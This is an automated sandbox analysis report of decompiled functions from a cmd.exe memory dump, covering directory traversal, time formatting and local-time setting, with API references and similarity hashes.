Instruction Fuzzy Hash: 9BA10230A043159BDF20EB68EC88BBA77B5AF45324F190299E846A7291DB30DD85CF74

Uniqueness

Uniqueness Score: -1.00%

Function 00D8B89C, Relevance: 18.3, APIs: 12, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00D8B89C(WCHAR* __ecx, short* __edx, signed int _a4) {
				signed int _v12;
				int _v24;
				char _v28;
				void* _v32;
				void _v552;
				struct _WIN32_FIND_DATAW _v1144;
				int _v1148;
				signed int _v1152;
				void* _v1156;
				char _v1160;
				intOrPtr _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t71;
				intOrPtr _t74;
				void* _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				signed char _t80;
				short _t83;
				short _t84;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t110;
				signed int _t116;
				WCHAR* _t119;
				intOrPtr* _t124;
				WCHAR* _t129;
				signed int _t131;
				intOrPtr* _t134;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t140;
				signed int _t144;
				short* _t146;
				void* _t148;
				short* _t150;
				void* _t151;
				int _t154;
				intOrPtr* _t155;
				void* _t159;
				signed int _t160;
				void* _t161;

				_t145 = __edx;
				_t71 =  *0xdad0b4; // 0x35c4fbb8
				_v12 = _t71 ^ _t160;
				_t119 = __ecx;
				_v1152 = _a4;
				_t155 = __ecx;
				_v1148 = 0;
				_t150 =  &(__ecx[1]);
				do {
					_t74 =  *_t155;
					_t155 = _t155 + 2;
				} while (_t74 != 0);
				_t157 = _t155 - _t150 >> 1;
				if((_t155 - _t150 >> 1) + 2 > __edx) {
					L10:
					_t76 = 0;
					L8:
					_pop(_t151);
					return E00D96FD0(_t76, _t119, _v12 ^ _t160, _t145, _t151, _t157);
				}
				_t124 = __ecx;
				_t145 =  &(__ecx[1]);
				do {
					_t78 =  *_t124;
					_t124 = _t124 + 2;
				} while (_t78 != 0);
				_t157 = _v1152;
				_t126 = _t124 - _t145 >> 1;
				_t79 = (_t124 - _t145 >> 1) - 2;
				_v1164 = _t79;
				 *_t157 = _t79;
				_t80 = GetFileAttributesW(__ecx);
				if(_t80 == 0xffffffff) {
					_push(0);
					_push(GetLastError());
					E00D8C5A2(_t126);
					goto L10;
				}
				if((_t80 & 0x00000010) != 0) {
					_t129 = _t119;
					_t146 =  &(_t129[1]);
					do {
						_t83 =  *_t129;
						_t129 =  &(_t129[1]);
					} while (_t83 != 0);
					_t131 = _t129 - _t146 >> 1;
					_t84 = 0x5c;
					_push(0x2a);
					if( *((intOrPtr*)(_t119 + _t131 * 2 - 2)) != _t84) {
						 *((short*)(_t119 + 4 + _t131 * 2)) = 0;
						_pop(_t145);
					} else {
						_t145 = 0;
						_pop(_t84);
					}
					_t119[_t131] = _t84;
					 *(_t119 + 2 + _t131 * 2) = _t145;
					_t86 = FindFirstFileW(_t119,  &_v1144);
					_v1156 = _t86;
					if(_t86 != 0xffffffff) {
						_t154 = 1;
						do {
							_t131 = ".";
							_t87 =  &(_v1144.cFileName);
							while(1) {
								_t145 =  *_t87;
								if(_t145 !=  *_t131) {
									break;
								}
								if(_t145 == 0) {
									L26:
									_t88 = 0;
									L28:
									if(_t88 == 0) {
										goto L57;
									}
									_t131 = L"..";
									_t96 =  &(_v1144.cFileName);
									while(1) {
										_t145 =  *_t96;
										if(_t145 !=  *_t131) {
											break;
										}
										if(_t145 == 0) {
											L34:
											_t97 = 0;
											L36:
											if(_t97 == 0) {
												goto L57;
											}
											_t134 =  &(_v1144.cFileName);
											_t145 = _t134 + 2;
											do {
												_t98 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t98 != _v1148);
											_t135 = _t134 - _t145;
											_t131 = _t135 >> 1;
											if(_t135 == 0) {
												goto L57;
											}
											if((_v1144.dwFileAttributes & 0x00000010) != 0) {
												_t99 =  *_t157;
												if(_t99 <= _t131) {
													_t99 = _t131;
												}
												 *_t157 = _t99;
												goto L57;
											}
											_v28 = 1;
											_v32 = 0;
											_v24 = 0x104;
											memset( &_v552, 0, 0x104);
											_t161 = _t161 + 0xc;
											if(E00D90C70( &_v552, ((0 | _v28 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
												SetLastError(8);
												L60:
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												L61:
												_t157 = GetLastError();
												FindClose(_v1156);
												if(_t154 != 0) {
													goto L10;
												}
												if(_t157 == 0x12) {
													goto L7;
												}
												_push(0);
												goto L64;
											}
											E00D90D89(_t145, _t119);
											_t148 = _v32;
											_t138 = _t148;
											if(_t148 == 0) {
												_t138 =  &_v552;
											}
											_t159 = _t138 + 2;
											do {
												_t110 =  *_t138;
												_t138 = _t138 + 2;
											} while (_t110 != _v1148);
											_t140 = _t138 - _t159 >> 1;
											if(_t148 == 0) {
												_t148 =  &_v552;
											}
											 *((short*)(_t148 + _t140 * 2 - 2)) = 0;
											E00D90CF2(_t148,  &(_v1144.cFileName));
											_t142 = _v32;
											if(_v32 == 0) {
												_t142 =  &_v552;
											}
											_t145 = _v24;
											if(E00D8B89C(_t142, _v24,  &_v1160) == 0) {
												goto L60;
											} else {
												_t157 = _v1152;
												_t144 = _v1164 + _v1160;
												_t116 =  *_t157;
												if(_t116 <= _t144) {
													_t116 = _t144;
												}
												 *_t157 = _t116;
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												goto L57;
											}
										}
										_t145 =  *((intOrPtr*)(_t96 + 2));
										_t33 = _t131 + 2; // 0x2e
										if(_t145 !=  *_t33) {
											break;
										}
										_t96 = _t96 + 4;
										_t131 = _t131 + 4;
										if(_t145 != 0) {
											continue;
										}
										goto L34;
									}
									asm("sbb eax, eax");
									_t97 = _t96 | 0x00000001;
									goto L36;
								}
								_t145 =  *((intOrPtr*)(_t87 + 2));
								_t30 = _t131 + 2; // 0x200000
								if(_t145 !=  *_t30) {
									break;
								}
								_t87 = _t87 + 4;
								_t131 = _t131 + 4;
								if(_t145 != 0) {
									continue;
								}
								goto L26;
							}
							asm("sbb eax, eax");
							_t88 = _t87 | 0x00000001;
							goto L28;
							L57:
							_t154 = FindNextFileW(_v1156,  &_v1144);
						} while (_t154 != 0);
						goto L61;
					} else {
						_t157 = GetLastError();
						FindClose(0xffffffff);
						if(_t157 == 2 || _t157 == 0x12) {
							goto L7;
						} else {
							_push(0);
							L64:
							_push(_t157);
							E00D8C5A2(_t131);
							_t76 = 0;
							goto L8;
						}
					}
				}
				L7:
				_t76 = 1;
				goto L8;
			}

0x00d8b89c
0x00d8b8a7
0x00d8b8ae
0x00d8b8b5
0x00d8b8b7
0x00d8b8be
0x00d8b8c3
0x00d8b8c9
0x00d8b8cc
0x00d8b8cc
0x00d8b8cf
0x00d8b8d2
0x00d8b8d9
0x00d8b8e0
0x00d99da8
0x00d99da8
0x00d8b928
0x00d8b92b
0x00d8b938
0x00d8b938
0x00d8b8e6
0x00d8b8ea
0x00d8b8ed
0x00d8b8ed
0x00d8b8f0
0x00d8b8f3
0x00d8b8f8
0x00d8b900
0x00d8b903
0x00d8b906
0x00d8b90c
0x00d8b90e
0x00d8b917
0x00d99d99
0x00d99da0
0x00d99da1
0x00000000
0x00d99da7
0x00d8b91f
0x00d99daf
0x00d99db1
0x00d99db4
0x00d99db4
0x00d99db7
0x00d99dba
0x00d99dc1
0x00d99dc5
0x00d99dc6
0x00d99dcd
0x00d99dd6
0x00d99ddb
0x00d99dcf
0x00d99dcf
0x00d99dd1
0x00d99dd1
0x00d99ddc
0x00d99de8
0x00d99ded
0x00d99df3
0x00d99dfc
0x00d99e28
0x00d99e29
0x00d99e29
0x00d99e2e
0x00d99e34
0x00d99e34
0x00d99e3a
0x00000000
0x00000000
0x00d99e3f
0x00d99e56
0x00d99e56
0x00d99e5f
0x00d99e61
0x00000000
0x00000000
0x00d99e67
0x00d99e6c
0x00d99e72
0x00d99e72
0x00d99e78
0x00000000
0x00000000
0x00d99e7d
0x00d99e94
0x00d99e94
0x00d99e9d
0x00d99e9f
0x00000000
0x00000000
0x00d99ea5
0x00d99eab
0x00d99eae
0x00d99eae
0x00d99eb1
0x00d99eb4
0x00d99ebd
0x00d99ebf
0x00d99ec1
0x00000000
0x00000000
0x00d99ece
0x00d99fb6
0x00d99fba
0x00d99fbc
0x00d99fbc
0x00d99fbe
0x00000000
0x00d99fbe
0x00d99ed6
0x00d99edf
0x00d99eea
0x00d99eee
0x00d99efb
0x00d99f14
0x00d99fe1
0x00d99fe7
0x00d99fea
0x00d99ff0
0x00d99ff1
0x00d99ffd
0x00d99fff
0x00d9a007
0x00000000
0x00000000
0x00d9a010
0x00000000
0x00000000
0x00d9a018
0x00000000
0x00d9a018
0x00d99f21
0x00d99f26
0x00d99f29
0x00d99f2d
0x00d99f2f
0x00d99f2f
0x00d99f35
0x00d99f38
0x00d99f38
0x00d99f3b
0x00d99f3e
0x00d99f49
0x00d99f4d
0x00d99f4f
0x00d99f4f
0x00d99f57
0x00d99f69
0x00d99f6e
0x00d99f73
0x00d99f75
0x00d99f75
0x00d99f7b
0x00d99f8c
0x00000000
0x00d99f8e
0x00d99f8e
0x00d99f9a
0x00d99fa0
0x00d99fa4
0x00d99fa6
0x00d99fa6
0x00d99fab
0x00d99fad
0x00d99fb3
0x00000000
0x00d99fb3
0x00d99f8c
0x00d99e7f
0x00d99e83
0x00d99e87
0x00000000
0x00000000
0x00d99e89
0x00d99e8c
0x00d99e92
0x00000000
0x00000000
0x00000000
0x00d99e92
0x00d99e98
0x00d99e9a
0x00000000
0x00d99e9a
0x00d99e41
0x00d99e45
0x00d99e49
0x00000000
0x00000000
0x00d99e4b
0x00d99e4e
0x00d99e54
0x00000000
0x00000000
0x00000000
0x00d99e54
0x00d99e5a
0x00d99e5c
0x00000000
0x00d99fc0
0x00d99fd3
0x00d99fd5
0x00000000
0x00d99dfe
0x00d99e06
0x00d99e08
0x00d99e11
0x00000000
0x00d99e20
0x00d99e20
0x00d9a019
0x00d9a019
0x00d9a01a
0x00d9a020
0x00000000
0x00d9a022
0x00d99e11
0x00d99dfc
0x00d8b925
0x00d8b927
0x00000000

APIs

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FE7,00000000), ref: 00D8B90E

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c2c26989b7e80468033e7d0e2e5f9b6e40f0b46226a6cf3b000a9a9bb7adc687
Instruction ID: 75aa168b1961ca08f104092ab479d7d42ae6623bacda5f546237e427bc305b5e
Opcode Fuzzy Hash: c2c26989b7e80468033e7d0e2e5f9b6e40f0b46226a6cf3b000a9a9bb7adc687
Instruction Fuzzy Hash: 7D91E1729002168BDF24EF68CC65ABAF3B5EF54310F5845ADE94AD7240EB319E81CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D896A0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 237
timeCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00D896A0(void* __ecx, void* __edx, signed int _a4, unsigned int _a8) {
				signed int _v8;
				short _v76;
				short _v332;
				signed short _v334;
				signed short _v336;
				signed int _v338;
				signed int _v340;
				struct _SYSTEMTIME _v348;
				signed int _v352;
				intOrPtr _v356;
				void* _v360;
				struct _FILETIME _v368;
				struct _FILETIME _v376;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				char* _t67;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed short _t80;
				signed int _t85;
				signed int _t88;
				signed int _t92;
				signed int _t99;
				void* _t106;
				void* _t111;
				signed int _t112;
				signed int _t114;
				void* _t116;
				void* _t119;
				signed int _t121;
				signed int _t122;
				void* _t123;
				signed int _t124;
				signed int _t126;
				signed int _t127;
				intOrPtr* _t131;
				void* _t133;
				int _t134;
				void* _t136;
				signed int _t138;
				signed int _t140;
				signed int _t141;
				void* _t142;

				_t58 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t58 ^ _t141;
				_t139 = _a4;
				_t136 = __edx;
				if(__ecx != 0) {
					E00DA3C49(__ecx,  &_v368);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v368);
				}
				FileTimeToLocalFileTime( &_v368,  &_v376);
				FileTimeToSystemTime( &_v376,  &_v348);
				if(_t136 != 1) {
					__eflags =  *0xdc3cc9;
					if( *0xdc3cc9 == 0) {
						__eflags =  *0xdad0cc;
						_t67 = "a";
						_t114 = _v340 & 0x0000ffff;
						if( *0xdad0cc == 0) {
							_t67 = " ";
						} else {
							__eflags = _t114 - 0xc;
							if(__eflags < 0) {
								__eflags = _t114;
								if(_t114 == 0) {
									_t114 = 0xc;
								}
							} else {
								if(__eflags > 0) {
									__eflags = _t114;
								}
								_t67 = "p";
							}
						}
						_push(_t67);
						_push(_v338 & 0x0000ffff);
						_push(0xdaf81c);
						E00D9274C( &_v76, 0x20, L"%02d%s%02d%s", _t114);
						L48:
						__eflags = _t139;
						if(_t139 != 0) {
							_t130 = _a8;
							E00D91040(_t139, _a8,  &_v76);
							_t116 = _t139 + 2;
							do {
								_t73 =  *_t139;
								_t139 = _t139 + 2;
								__eflags = _t73;
							} while (_t73 != 0);
							goto L6;
						}
						_t131 =  &_v76;
						_t119 = _t131 + 2;
						do {
							_t76 =  *_t131;
							_t131 = _t131 + 2;
							__eflags = _t76;
						} while (_t76 != 0);
						_t130 = _t131 - _t119 >> 1;
						_t74 = E00D92616( &_v76, _t131 - _t119 >> 1);
						goto L7;
					}
					_v352 = 0;
					_t79 = GetLocaleInfoW(E00D941A4(), 0x1003,  &_v332, 0x80);
					__eflags = _t79;
					if(_t79 != 0) {
						L20:
						_t80 = _v332;
						_t136 =  &_v332;
						__eflags = _t80;
						if(_t80 == 0) {
							L37:
							_t85 = GetTimeFormatW(E00D941A4(), 2,  &_v348,  &_v332,  &_v76, 0x20);
							__eflags = _t85;
							if(_t85 == 0) {
								_v76 = _t85;
							}
							goto L48;
						}
						_t112 = _t80 & 0x0000ffff;
						_t121 = 0;
						__eflags = 0;
						do {
							__eflags = _t112 - 0x27;
							if(_t112 != 0x27) {
								__eflags = _t121;
								if(_t121 == 0) {
									__eflags = _t112 - 0x68;
									if(_t112 == 0x68) {
										L29:
										_t122 = 0;
										__eflags = 0;
										do {
											_t136 = _t136 + 2;
											_t122 = _t122 + 1;
											__eflags =  *_t136 - _t112;
										} while ( *_t136 == _t112);
										_t133 = _t136 +  ~_t122 * 2;
										_v360 = _t133;
										_t136 = _t133 + 2;
										__eflags = _t122 - 1;
										if(_t122 != 1) {
											L35:
											_t121 = _v352;
											goto L36;
										}
										_t123 = _t133;
										_v356 = _t123 + 2;
										do {
											_t92 =  *_t123;
											_t123 = _t123 + 2;
											__eflags = _t92;
										} while (_t92 != 0);
										_t124 = _t123 - _v356;
										__eflags = _t124;
										memmove(_t136, _t133, 2 + (_t124 >> 1) * 2);
										_t142 = _t142 + 0xc;
										 *_v360 = _t112;
										goto L35;
									}
									__eflags = _t112 - 0x48;
									if(_t112 == 0x48) {
										goto L29;
									}
									__eflags = _t112 - 0x6d;
									if(_t112 != 0x6d) {
										goto L36;
									}
									goto L29;
								}
								_t136 = _t136 + 2;
								goto L36;
							}
							_t136 = _t136 + 2;
							__eflags = _t121;
							_t121 = 0 | _t121 == 0x00000000;
							_v352 = _t121;
							L36:
							_t88 =  *(_t136 + 2) & 0x0000ffff;
							_t136 = _t136 + 2;
							_t112 = _t88;
							__eflags = _t88;
						} while (_t88 != 0);
						goto L37;
					}
					_t126 =  &_v332;
					_t134 = 0x80;
					_t138 = L"HH:mm:ss t" - _t126;
					__eflags = _t138;
					while(1) {
						_t25 = _t134 + 0x7fffff7e; // 0x7ffffffe
						__eflags = _t25;
						if(_t25 == 0) {
							break;
						}
						_t99 =  *(_t138 + _t126) & 0x0000ffff;
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						 *_t126 = _t99;
						_t126 = _t126 + 2;
						_t134 = _t134 - 1;
						__eflags = _t134;
						if(_t134 != 0) {
							continue;
						}
						L18:
						_t126 = _t126 - 2;
						__eflags = _t126;
						L19:
						__eflags = 0;
						 *_t126 = 0;
						goto L20;
					}
					__eflags = _t134;
					if(_t134 != 0) {
						goto L19;
					}
					goto L18;
				} else {
					_t127 = _v334 & 0x0000ffff;
					_t130 = 0xcccccccd * _t127 >> 0x20 >> 3;
					_push(0xcccccccd * _t127 >> 0x20 >> 3);
					_push(0xdaf7fc);
					_push(_v336 & 0x0000ffff);
					_push(0xdaf81c);
					_push(_v338 & 0x0000ffff);
					_push(0xdaf81c);
					_push(_v340 & 0x0000ffff);
					_push(L"%2d%s%02d%s%02d%s%02d");
					if(_t139 == 0) {
						_t74 = E00D925D9();
						L7:
						return E00D96FD0(_t74, _t111, _v8 ^ _t141, _t130, _t136, _t139);
					} else {
						_push(_a8);
						_push(_t139);
						E00D9274C();
						_t116 = _t139 + 2;
						do {
							_t106 =  *_t139;
							_t139 = _t139 + 2;
						} while (_t106 != 0);
						L6:
						_t140 = _t139 - _t116;
						_t139 = _t140 >> 1;
						_t74 = _t140 >> 1;
						goto L7;
					}
				}
			}

0x00d896ab
0x00d896b2
0x00d896b7
0x00d896bb
0x00d896bf
0x00da0ad6
0x00d896c5
0x00d896cc
0x00d896e0
0x00d896e0
0x00d896f4
0x00d89708
0x00d89711
0x00da0aed
0x00da0af4
0x00da0c53
0x00da0c5a
0x00da0c5f
0x00da0c66
0x00da0c84
0x00da0c68
0x00da0c68
0x00da0c6b
0x00da0c79
0x00da0c7b
0x00da0c7d
0x00da0c7d
0x00da0c6d
0x00da0c6d
0x00da0c6f
0x00da0c6f
0x00da0c72
0x00da0c72
0x00da0c6b
0x00da0c89
0x00da0c91
0x00da0c92
0x00da0ca3
0x00da0cab
0x00da0cab
0x00da0cad
0x00da0cd1
0x00da0cda
0x00da0cdf
0x00da0ce2
0x00da0ce2
0x00da0ce5
0x00da0ce8
0x00da0ce8
0x00000000
0x00da0ced
0x00da0caf
0x00da0cb2
0x00da0cb5
0x00da0cb5
0x00da0cb8
0x00da0cbb
0x00da0cbb
0x00da0cc5
0x00da0cc7
0x00000000
0x00da0cc7
0x00da0b05
0x00da0b1b
0x00da0b21
0x00da0b23
0x00da0b65
0x00da0b65
0x00da0b6c
0x00da0b72
0x00da0b75
0x00da0c27
0x00da0c43
0x00da0c49
0x00da0c4b
0x00da0c4d
0x00da0c4d
0x00000000
0x00da0c4b
0x00da0b7b
0x00da0b7e
0x00da0b7e
0x00da0b80
0x00da0b80
0x00da0b84
0x00da0b9a
0x00da0b9c
0x00da0ba3
0x00da0ba7
0x00da0bb5
0x00da0bb5
0x00da0bb5
0x00da0bb7
0x00da0bb7
0x00da0bba
0x00da0bbb
0x00da0bbb
0x00da0bc4
0x00da0bc7
0x00da0bcd
0x00da0bd0
0x00da0bd3
0x00da0c0f
0x00da0c0f
0x00000000
0x00da0c0f
0x00da0bd5
0x00da0bda
0x00da0be0
0x00da0be0
0x00da0be3
0x00da0be6
0x00da0be6
0x00da0beb
0x00da0beb
0x00da0bfd
0x00da0c09
0x00da0c0c
0x00000000
0x00da0c0c
0x00da0ba9
0x00da0bad
0x00000000
0x00000000
0x00da0baf
0x00da0bb3
0x00000000
0x00000000
0x00000000
0x00da0bb3
0x00da0b9e
0x00000000
0x00da0b9e
0x00da0b88
0x00da0b8b
0x00da0b90
0x00da0b92
0x00da0c15
0x00da0c15
0x00da0c19
0x00da0c1c
0x00da0c1e
0x00da0c1e
0x00000000
0x00da0b80
0x00da0b25
0x00da0b32
0x00da0b37
0x00da0b37
0x00da0b39
0x00da0b39
0x00da0b3f
0x00da0b41
0x00000000
0x00000000
0x00da0b43
0x00da0b47
0x00da0b4a
0x00000000
0x00000000
0x00da0b4c
0x00da0b4f
0x00da0b52
0x00da0b52
0x00da0b55
0x00000000
0x00000000
0x00da0b5d
0x00da0b5d
0x00da0b5d
0x00da0b60
0x00da0b60
0x00da0b62
0x00000000
0x00da0b62
0x00da0b59
0x00da0b5b
0x00000000
0x00000000
0x00000000
0x00d89717
0x00d89717
0x00d8972c
0x00d8972f
0x00d89730
0x00d89735
0x00d8973d
0x00d89742
0x00d8974a
0x00d8974f
0x00d89750
0x00d89757
0x00da0ae0
0x00d89781
0x00d89791
0x00d8975d
0x00d8975d
0x00d89760
0x00d89761
0x00d89769
0x00d89770
0x00d89770
0x00d89773
0x00d89776
0x00d8977b
0x00d8977b
0x00d8977d
0x00d8977f
0x00000000
0x00d8977f
0x00d89757

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00DAF830,?,00002000), ref: 00D896CC
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D896E0
FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00D896F4
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D89708
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 00DA0B1B
GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 00DA0C43

Strings

%02d%s%02d%s, xrefs: 00DA0C98
HH:mm:ss t, xrefs: 00DA0B2B
%2d%s%02d%s%02d%s%02d, xrefs: 00D89750

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Time$File$System$FormatInfoLocalLocale
String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
API String ID: 55602301-2516506544
Opcode ID: 0a674ee58daec4e64673749ee2e5b4a1369828bba39f3aaeb89aedbc63741e3d
Instruction ID: 80a676b50c3d2333b6418da52d92ce6b148952715c872229678225c90c07d97d
Opcode Fuzzy Hash: 0a674ee58daec4e64673749ee2e5b4a1369828bba39f3aaeb89aedbc63741e3d
Instruction Fuzzy Hash: 4481E575A0021A9BCF249F64CC55BFEB778EF56710F08429AE84AE7240E7349E85CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00DA3CC7, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
timeCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00DA3CC7(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v34;
				short _v36;
				char _v40;
				char _v72;
				char _v604;
				struct _SYSTEMTIME _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				signed int _t50;
				short* _t55;
				void* _t61;
				intOrPtr _t67;
				signed int* _t78;
				signed int _t87;
				intOrPtr* _t88;
				short* _t96;
				signed int _t101;
				intOrPtr* _t103;
				void* _t108;
				void* _t110;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int* _t120;
				short* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t128;
				void* _t129;

				_t38 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t38 ^ _t127;
				_t124 = __edx;
				_t88 = __ecx;
				if(__edx != 0) {
					_t91 =  &_v34;
					_v40 = 0x2e003a;
					_v36 =  *0xdaf81c;
					E00D91040( &_v34, 0xd, 0xdaf7fc);
					goto L10;
				} else {
					_t122 = __edx + 0x10;
					_t120 =  &_v40;
					_t110 = L"/-." - _t120;
					while(_t122 + 0x7fffffee != 0) {
						_t87 =  *(_t110 + _t120) & 0x0000ffff;
						if(_t87 == 0) {
							break;
						}
						 *_t120 = _t87;
						_t120 =  &(_t120[0]);
						_t122 = _t122 - 1;
						if(_t122 != 0) {
							continue;
						}
						L7:
						_t120 = _t120 - 2;
						L8:
						_t91 =  &_v40;
						 *_t120 = 0;
						E00D918C0( &_v40, 0x10, 0xdaf80c);
						L10:
						while(1) {
							L10:
							if(_t88 == 0 ||  *_t88 == 0) {
								_t42 =  *0xdad540; // 0x0
								_t43 = _t42;
								if(_t43 == 0) {
									_t44 = 0x2342;
								} else {
									if(_t43 == 2) {
										_t44 = 0x4000271d;
									} else {
										_t44 = 0x4000271e;
									}
								}
								if(_t124 != 0) {
									_push(0);
									_push(0x2343);
									E00D8C108(_t91);
									_t129 = _t128 + 8;
								} else {
									E00D8C108(_t91, _t44, 1, 0xdaf80c);
									_t129 = _t128 + 0xc;
								}
								__imp___get_osfhandle( &_v624);
								_t128 = _t129 + 4;
								_t113 =  &_v604;
								if(E00DA3B11( &_v624,  &_v604, 0, 0x104) == 0) {
									goto L58;
								} else {
									_t50 = _v624;
									if(_t50 == 0) {
										goto L58;
									}
									 *((short*)(_t127 + _t50 * 2 - 0x258)) = 0;
									_t96 =  &_v604;
									_t51 = _v604;
									if(_t51 == 0) {
										L33:
										if(E00D90178(_t51) == 0) {
											_push( &_v604);
											E00D925D9(L"%s\r\n");
											_t128 = _t128 + 8;
										}
										goto L35;
									}
									_t119 = _t51 & 0x0000ffff;
									while(_t119 != 0xa && _t119 != 0xd) {
										_t51 =  *(_t96 + 2) & 0x0000ffff;
										_t96 = _t96 + 2;
										_t119 = _t51;
										if(_t51 != 0) {
											continue;
										}
										goto L33;
									}
									_t51 = 0;
									 *_t96 = 0;
									goto L33;
								}
							} else {
								_t103 = _t88;
								_t11 = _t103 + 2; // 0x2
								_t113 = _t11;
								do {
									_t67 =  *_t103;
									_t103 = _t103 + 2;
								} while (_t67 != 0);
								_t105 = _t103 - _t113 >> 1;
								if(_t103 - _t113 >> 1 >= 0x104) {
									_push(0);
									asm("sbb esi, esi");
									_push(_t124);
									E00D8C108(_t105);
									L57:
									L58:
									_t48 = 1;
									L59:
									return E00D96FD0(_t48, _t88, _v8 ^ _t127, _t113, _t122, _t124);
								}
								E00D91040( &_v604, 0x105, _t88);
								L35:
								E00D91040( &_v72, 0x10,  &_v40);
								_t115 = 0x10;
								_t55 =  &_v72;
								while( *_t55 != 0) {
									_t55 = _t55 + 2;
									_t115 = _t115 - 1;
									if(_t115 != 0) {
										continue;
									}
									break;
								}
								asm("sbb ecx, ecx");
								_t101 =  ~_t115 & 0x00000010 - _t115;
								if(_t115 == 0) {
									L48:
									_t113 =  &_v72;
									_t122 = E00D8EA40( &_v604,  &_v72, 2);
									if( *_t122 == 0) {
										L61:
										_t48 = 0;
										goto L59;
									}
									GetLocalTime( &_v620);
									_t113 = _t122;
									_t91 =  &_v620;
									_push( &_v40);
									if(_t124 != 0) {
										_t61 = E00DA4159( &_v620, _t113);
									} else {
										_t61 = E00DA3FD4( &_v620, _t113);
									}
									if(_t61 == 0) {
										L55:
										_push(0);
										asm("sbb eax, eax");
										_push(( ~_t124 & 0x00000003) + 0x232f);
										E00D8C108(_t91);
										_t128 = _t128 + 8;
										_t88 = 0;
										continue;
									} else {
										SetLocalTime( &_v620);
										if(SetLocalTime( &_v620) != 0) {
											goto L61;
										}
										if(GetLastError() == 0x522) {
											_push(0);
											_push(GetLastError());
											E00D8C5A2(_t91);
											goto L57;
										}
										goto L55;
									}
								}
								_t78 =  &_v72 + _t101 * 2;
								_t118 = 0x10 - _t101;
								if(0x10 == 0) {
									L46:
									_t78 = _t78 - 2;
									L47:
									 *_t78 = 0;
									goto L48;
								}
								_t108 = 0x7ffffffe;
								_t88 = ";" - _t78;
								while(_t108 != 0) {
									_t123 =  *(_t88 + _t78) & 0x0000ffff;
									if(_t123 == 0) {
										break;
									}
									 *_t78 = _t123;
									_t108 = _t108 - 1;
									_t78 =  &(_t78[0]);
									_t118 = _t118 - 1;
									if(_t118 != 0) {
										continue;
									}
									goto L46;
								}
								if(_t118 != 0) {
									goto L47;
								}
								goto L46;
							}
						}
					}
					if(_t122 != 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x00da3cd2
0x00da3cd9
0x00da3cde
0x00da3ce0
0x00da3ce5
0x00da3d3b
0x00da3d48
0x00da3d4f
0x00da3d53
0x00000000
0x00da3ce7
0x00da3ce7
0x00da3cef
0x00da3cf4
0x00da3cf7
0x00da3d01
0x00da3d08
0x00000000
0x00000000
0x00da3d0a
0x00da3d0d
0x00da3d10
0x00da3d13
0x00000000
0x00000000
0x00da3d1b
0x00da3d1b
0x00da3d1e
0x00da3d20
0x00da3d23
0x00da3d2e
0x00000000
0x00da3d58
0x00da3d58
0x00da3d5a
0x00da3d98
0x00da3d9d
0x00da3da0
0x00da3db5
0x00da3da2
0x00da3da5
0x00da3dae
0x00da3da7
0x00da3da7
0x00da3da7
0x00da3da5
0x00da3dbc
0x00da3dd0
0x00da3dd2
0x00da3dd7
0x00da3ddc
0x00da3dbe
0x00da3dc6
0x00da3dcb
0x00da3dcb
0x00da3ded
0x00da3df3
0x00da3df6
0x00da3e05
0x00000000
0x00da3e0b
0x00da3e0b
0x00da3e13
0x00000000
0x00000000
0x00da3e1b
0x00da3e23
0x00da3e29
0x00da3e33
0x00da3e59
0x00da3e62
0x00da3e6a
0x00da3e70
0x00da3e75
0x00da3e75
